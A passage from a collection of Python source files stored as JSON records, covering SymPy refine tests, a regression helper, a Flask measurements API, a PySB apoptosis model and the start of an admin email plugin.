0), (3, True)), ~Q.is_true(x >= 0)) == 3\n assert refine(Piecewise((1, x >= 0), (3, True)), Q.is_true(y >= 0)) == \\\n Piecewise((1, x >= 0), (3, True))\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), Q.is_true(Eq(x, 0)))\\\n == 1\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), Q.is_true(Eq(0, x)))\\\n == 1\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), ~Q.is_true(Eq(x, 0)))\\\n == 3\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), ~Q.is_true(Eq(0, x)))\\\n == 3\n assert refine(Piecewise((1, Eq(x, 0)), (3, True)), Q.is_true(Eq(y, 0)))\\\n == Piecewise((1, Eq(x, 0)), (3, True))\n assert refine(Piecewise((1, Ne(x, 0)), (3, True)), Q.is_true(Ne(x, 0)))\\\n == 1\n assert refine(Piecewise((1, Ne(x, 0)), (3, True)), ~Q.is_true(Ne(x, 0)))\\\n == 3\n assert refine(Piecewise((1, Ne(x, 0)), (3, True)), Q.is_true(Ne(y, 0)))\\\n == Piecewise((1, Ne(x, 0)), (3, True))\n\n\ndef test_atan2():\n assert refine(atan2(y, x), Q.real(y) & Q.positive(x)) == atan(y/x)\n assert refine(atan2(y, x), Q.negative(y) & Q.positive(x)) == atan(y/x)\n assert refine(atan2(y, x), Q.negative(y) & Q.negative(x)) == atan(y/x) - pi\n assert refine(atan2(y, x), Q.positive(y) & Q.negative(x)) == atan(y/x) + pi\n assert refine(atan2(y, x), Q.zero(y) & Q.negative(x)) == pi\n assert refine(atan2(y, x), Q.positive(y) & Q.zero(x)) == pi/2\n assert refine(atan2(y, x), Q.negative(y) & Q.zero(x)) == -pi/2\n assert refine(atan2(y, x), Q.zero(y) & Q.zero(x)) == nan\n\n\ndef test_func_args():\n class MyClass(Expr):\n # A class with nontrivial .func\n\n def __init__(self, *args):\n self.my_member = \"\"\n\n @property\n def func(self):\n def my_func(*args):\n obj = MyClass(*args)\n obj.my_member = self.my_member\n return obj\n return my_func\n\n x = MyClass()\n x.my_member = \"A very important value\"\n assert x.my_member == refine(x).my_member\n\n\ndef test_eval_refine():\n from sympy.core.expr import Expr\n class MockExpr(Expr):\n def _eval_refine(self, assumptions):\n return True\n\n mock_obj = MockExpr()\n assert refine(mock_obj)\n\ndef test_refine_issue_12724():\n expr1 = refine(Abs(x * y), Q.positive(x))\n expr2 = refine(Abs(x * y * z), Q.positive(x))\n assert expr1 == x * Abs(y)\n assert expr2 == x * Abs(y * z)\n y1 = Symbol('y1', real = True)\n expr3 = refine(Abs(x * y1**2 * z), Q.positive(x))\n assert expr3 == x * y1**2 * Abs(z)\n"} {"ext": "py", "sha": "1a2f20b4f57c9954cfe57f7236c48aedc8151d94", "content": "from __future__ import print_function\nimport numpy as np\n\ndef q(y_true, y_pred):\n\t'''q value as described in Tropsha, Gramatica, Gombar:\n\tThe Importance of Being Earnest'''\n\ty_true = np.array(y_true)\n\ty_pred = np.array(y_pred)\n\ty_mean = np.mean(y_true)\n\treturn 1 - np.sum((y_true - y_pred) ** 2) / np.sum((y_true - y_mean) ** 2)\n\ndef linreg(x, y):\n\t'''Computes a linear regression through the origin using OLS'''\n\tx = np.array(x)\n\ty = np.array(y)\n\tx = x[:, np.newaxis]\n\ta, _, _, _ = np.linalg.lstsq(x, y, rcond=-1.)\n\tr2 = q(y, (x * a)[:, 0])\n\treturn (r2, a)"} {"ext": "py", "sha": "1a2f20b95d23ec33820bade8a811fd92a94e6e44", "content": "import os\n\nfrom dateutil.parser import parse as date_parser\nfrom flask import request, current_app\nfrom flask_restful.fields import Integer, List, Nested, Raw, String\nfrom werkzeug.utils import secure_filename\n\nfrom analysisweb.api import db\nfrom analysisweb_user.models import Measurement, MeasurementFile\nfrom . import (\n ResourceBase,\n MetaResource,\n ResourceInvalidInputException,\n ResourceForbiddenActionException,\n ResourceNotFoundException,\n IDField,\n)\n\n\nclass MeasurementResource(ResourceBase):\n\n db_table = Measurement\n\n measurement_file = {\n \"label\": String,\n \"path\": String(\n attribute=lambda x: \"files/measurement/{}/{}\".format(\n x.measurement_id, x.path\n )\n ),\n }\n\n fields = {\n \"id\": Integer,\n \"label\": String,\n \"start_date\": String,\n \"end_date\": String,\n \"meta_data\": Raw,\n \"files\": List(Nested(measurement_file)),\n \"jobs\": List(IDField),\n }\n\n def get(self, id_):\n \"\"\"\n Receive a measurement\n ---\n summary: Find a measurement by ID\n tags:\n - measurements\n parameters:\n - name: id\n in: path\n description: ID of measurement to return\n required: true\n schema:\n type: integer\n responses:\n 200:\n description: successful operation\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/Measurement\"\n 400:\n description: Invalid ID supplied\n 404:\n description: Measurement not found\n \"\"\"\n try:\n resource = self.get_resource(id_)\n except (ResourceInvalidInputException, ResourceNotFoundException) as e:\n return {\"status\": str(e)}, e.response_code\n return self.dump_resource(resource), 200\n\n def delete(self, id_):\n \"\"\"\n Delete a measurement\n ---\n summary: Deletes a measurement\n tags:\n - measurements\n parameters:\n - name: id\n in: path\n description: ID of measurement to return\n required: true\n schema:\n type: integer\n responses:\n 200:\n description: Measurement deleted and returned\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/Measurement\"\n 400:\n description: Invalid ID supplied\n 404:\n description: Measurement not found\n 405:\n description: Cannot delete measurement associated with a job\n \"\"\"\n try:\n resource = self.get_resource(id_)\n except (ResourceInvalidInputException, ResourceNotFoundException) as e:\n return {\"status\": str(e)}, e.response_code\n\n try:\n return self.delete_resource(\n current_app.config[\"MEASUREMENT_FILES_FOLDER\"], resource\n )\n except ResourceForbiddenActionException as e:\n return {\"status\": str(e)}, e.response_code\n\n def put(self, id_):\n \"\"\"\n Update the basic information about a measurement\n ---\n summary: Updates a measurement with new data\n tags:\n - measurements\n parameters:\n - name: id\n in: path\n description: ID of measurement to return\n required: true\n schema:\n type: integer\n requestBody:\n content:\n multipart/form-data:\n schema:\n properties:\n start_date:\n type: string\n format: date-time\n end_date:\n type: string\n format: date-time\n label:\n type: string\n meta_data:\n type: string\n responses:\n 200:\n description: Measurement updated and returned\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/Measurement\"\n 400:\n description: Invalid ID supplied or invalid input\n 404:\n description: Measurement not found\n \"\"\"\n\n try:\n resource = self.get_resource(id_)\n except (ResourceInvalidInputException, ResourceNotFoundException) as e:\n return {\"status\": str(e)}, e.response_code\n\n try:\n self._update_measurement(resource)\n except ResourceInvalidInputException as e:\n return {\"status\": str(e)}, e.response_code\n return self.dump_resource(resource), 200\n\n def _update_measurement(self, resource):\n start_date, end_date = self.parse_dates(\n str(resource.start_date), str(resource.end_date)\n )\n resource.start_date = start_date\n resource.end_date = end_date\n resource.label = request.form.get(\"label\", resource.label)\n self.load_metadata(request.form.get(\"meta_data\", \"{}\"), resource)\n db.session.commit()\n\n @staticmethod\n def parse_dates(start=None, end=None):\n try:\n start_date = date_parser(request.form.get(\"start_date\", start))\n end_date = date_parser(request.form.get(\"end_date\", end))\n except ValueError as e:\n raise ResourceInvalidInputException(str(e))\n\n if end_date < start_date:\n raise ResourceInvalidInputException(\"end date < start date\")\n return start_date, end_date\n\n\nclass MeasurementListResource(ResourceBase):\n\n db_table = Measurement\n fields = MeasurementResource.fields\n\n def get(self):\n \"\"\"\n Obtain a list of measurements\n ---\n summary: Retrieve a list of measurements\n tags:\n - measurements\n responses:\n 200:\n description: OK\n content:\n application/json:\n schema:\n type: array\n items:\n $ref: \"#/components/schemas/Measurement\"\n \"\"\"\n return self.get_all(), 200\n\n def post(self):\n \"\"\"\n Add a new measurement\n ---\n summary: Add a new measurement\n tags:\n - measurements\n requestBody:\n content:\n multipart/form-data:\n schema:\n properties:\n start_date:\n type: string\n format: date-time\n end_date:\n type: string\n format: date-time\n label:\n type: string\n meta_data:\n type: string\n files:\n type: array\n items:\n $ref: \"#/components/schemas/File\"\n responses:\n 201:\n description: Measurement created\n 400:\n description: Invalid input\n \"\"\"\n try:\n measurement_id = self._add_measurement()\n except ResourceInvalidInputException as e:\n return {\"status\": str(e)}, e.response_code\n return {\"status\": \"success\", \"id\": measurement_id}, 201\n\n def _add_measurement(self):\n self._validate_form_data()\n start_date, end_date = MeasurementResource.parse_dates()\n m = Measurement(\n start_date=start_date, end_date=end_date, label=request.form[\"label\"]\n )\n db.session.add(m)\n db.session.flush()\n measurement_id = m.id\n self.load_metadata(request.form.get(\"meta_data\", \"{}\"), m)\n file_folder = os.path.join(\n current_app.config[\"MEASUREMENT_FILES_FOLDER\"], str(measurement_id)\n )\n os.makedirs(file_folder)\n print(request.files)\n self._add_measurement_files(m, request.files.items(), file_folder)\n db.session.commit()\n return measurement_id\n\n @staticmethod\n def _add_measurement_files(measurement, file_list, path):\n \"\"\"\n Add files to a measurement\n\n Parameters\n ----------\n measurement: Measurement\n the measurement to which add the files\n file_list: list of werkzeug.Files\n the given list of files\n path: str\n the folder in which to upload the files to\n \"\"\"\n for label, file in file_list:\n if file:\n filename = secure_filename(file.filename)\n file.save(os.path.join(path, filename))\n f = MeasurementFile(label=label, path=filename, measurement=measurement)\n db.session.add(f)\n\n @staticmethod\n def _validate_form_data():\n if (\n \"start_date\" not in request.form\n or \"end_date\" not in request.form\n or \"label\" not in request.form\n or not request.files\n ):\n raise ResourceInvalidInputException(\"Missing input\")\n\n\nclass MeasurementMetaResource(MetaResource):\n def get(self):\n return self.load_meta(\"user_meta.json\")\n"} {"ext": "py", "sha": "1a2f20d5bffc38dc6ca1d9ea88d5489f700e4fac", "content": "# exported from PySB model 'model'\n\nfrom pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD\n\nModel()\n\nMonomer('C6A', ['C8pro'])\nMonomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'SmacM'])\nMonomer('Ligand', ['Receptor'])\nMonomer('C6pro', ['C3A'])\nMonomer('ParpU', ['C3A'])\nMonomer('BidU', ['C8A'])\nMonomer('BidT')\nMonomer('C3A', ['Xiap', 'ParpU', 'C6pro'])\nMonomer('BidM', ['BaxM'])\nMonomer('BaxM', ['BidM', 'BaxA'])\nMonomer('C8A', ['BidU', 'C3pro'])\nMonomer('Xiap', ['SmacC', 'C3A'])\nMonomer('Receptor', ['Ligand', 'Fadd'])\nMonomer('C3ub')\nMonomer('Fadd', ['Receptor', 'C8pro'])\nMonomer('C3pro', ['C8A'])\nMonomer('SmacM', ['BaxA'])\nMonomer('SmacC', ['Xiap'])\nMonomer('C8pro', ['Fadd', 'C6A'])\nMonomer('ParpC')\n\nParameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)\nParameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)\nParameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)\nParameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)\nParameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)\nParameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)\nParameter('pore_formation_0_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_0_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_1_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_1_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_2_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_2_BaxA_pore_1kr', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)\nParameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('C6A_0', 0.0)\nParameter('BaxA_0', 0.0)\nParameter('Ligand_0', 1000.0)\nParameter('C6pro_0', 100.0)\nParameter('ParpU_0', 1000000.0)\nParameter('BidU_0', 171000.0)\nParameter('BidT_0', 0.0)\nParameter('C3A_0', 0.0)\nParameter('BidM_0', 0.0)\nParameter('BaxM_0', 40000.0)\nParameter('C8A_0', 0.0)\nParameter('Xiap_0', 50750.0)\nParameter('Receptor_0', 100.0)\nParameter('C3ub_0', 0.0)\nParameter('Fadd_0', 130000.0)\nParameter('C3pro_0', 21000.0)\nParameter('SmacM_0', 100000.0)\nParameter('SmacC_0', 0.0)\nParameter('C8pro_0', 130000.0)\nParameter('ParpC_0', 0.0)\n\nObservable('C6A_obs', C6A())\nObservable('BaxA_obs', BaxA())\nObservable('Ligand_obs', Ligand())\nObservable('C6pro_obs', C6pro())\nObservable('ParpU_obs', ParpU())\nObservable('BidU_obs', BidU())\nObservable('BidT_obs', BidT())\nObservable('C3A_obs', C3A())\nObservable('BidM_obs', BidM())\nObservable('BaxM_obs', BaxM())\nObservable('C8A_obs', C8A())\nObservable('Xiap_obs', Xiap())\nObservable('Receptor_obs', Receptor())\nObservable('C3ub_obs', C3ub())\nObservable('Fadd_obs', Fadd())\nObservable('C3pro_obs', C3pro())\nObservable('SmacM_obs', SmacM())\nObservable('SmacC_obs', SmacC())\nObservable('C8pro_obs', C8pro())\nObservable('ParpC_obs', ParpC())\n\nRule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)\nRule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)\nRule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)\nRule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)\nRule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)\nRule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)\nRule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)\nRule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)\nRule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)\nRule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)\nRule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)\nRule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)\nRule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)\nRule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)\nRule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)\nRule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)\nRule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)\nRule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)\nRule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)\nRule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5) % SmacM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)\nRule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)\nRule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)\nRule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)\nRule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)\n\nInitial(C6A(C8pro=None), C6A_0)\nInitial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None), BaxA_0)\nInitial(Ligand(Receptor=None), Ligand_0)\nInitial(C6pro(C3A=None), C6pro_0)\nInitial(ParpU(C3A=None), ParpU_0)\nInitial(BidU(C8A=None), BidU_0)\nInitial(BidT(), BidT_0)\nInitial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)\nInitial(BidM(BaxM=None), BidM_0)\nInitial(BaxM(BidM=None, BaxA=None), BaxM_0)\nInitial(C8A(BidU=None, C3pro=None), C8A_0)\nInitial(Xiap(SmacC=None, C3A=None), Xiap_0)\nInitial(Receptor(Ligand=None, Fadd=None), Receptor_0)\nInitial(C3ub(), C3ub_0)\nInitial(Fadd(Receptor=None, C8pro=None), Fadd_0)\nInitial(C3pro(C8A=None), C3pro_0)\nInitial(SmacM(BaxA=None), SmacM_0)\nInitial(SmacC(Xiap=None), SmacC_0)\nInitial(C8pro(Fadd=None, C6A=None), C8pro_0)\nInitial(ParpC(), ParpC_0)\n\n"} {"ext": "py", "sha": "1a2f21a734886d5cebf0d7bfc1fdad145163cde6", "content": "from typing import TYPE_CHECKING\n\nfrom ..email_common import get_email_subject, get_email_template_or_default\nfrom . import constants\nfrom .tasks import (\n send_email_with_link_to_download_file_task,\n send_export_failed_email_task,\n send_set_staff_password_email_task,\n send_staff_order_confirmation_email_task,\n send_staff_password_reset_email_task,\n)\n\nif TYPE_CHECKING:\n from .plugin import AdminEmailPlugin\n\n\ndef send_set_staff_password_email(\n payload: dict, config: dict, plugin: \"AdminEmailPlugin\"\n):\n recipient_email = payload[\"recipient_email\"]\n template = get_email_template_or_default(\n plugin,\n constants.SET_STAFF_PASSWORD_TEMPLATE_FIELD,\n constants.SET_STAFF_PASSWORD_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.SET_STAFF_PASSWORD_SUBJECT_FIELD,\n constants.SET_STAFF_PASSWORD_DEFAULT_SUBJECT,\n )\n send_set_staff_password_email_task.delay(\n recipient_email, payload, config, subject, template\n )\n\n\ndef send_csv_export_success(payload: dict, config: dict, plugin: \"AdminEmailPlugin\"):\n recipient_email = payload.get(\"recipient_email\")\n if recipient_email:\n template = get_email_template_or_default(\n plugin,\n constants.CSV_EXPORT_SUCCESS_TEMPLATE_FIELD,\n constants.CSV_EXPORT_SUCCESS_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n plugin.configuration,\n constants.CSV_EXPORT_SUCCESS_SUBJECT_FIELD,\n constants.CSV_EXPORT_SUCCESS_DEFAULT_SUBJECT,\n )\n send_email_with_link_to_download_file_task.delay(\n recipient_email, payload, config, subject, template\n )\n\n\ndef send_staff_order_confirmation(\n payload: dict, config: dict, plugin: \"AdminEmailPlugin\"\n):\n recipient_list = payload.get(\"recipient_list\")\n template = get_email_template_or_default(\n plugin,\n constants.STAFF_ORDER_CONFIRMATION_TEMPLATE_FIELD,\n constants.STAFF_ORDER_CONFIRMATION_DEFAULT_TEMPLATE,\n constants.DEFAULT_EMAIL_TEMPLATES_PATH,\n )\n subject = get_email_subject(\n 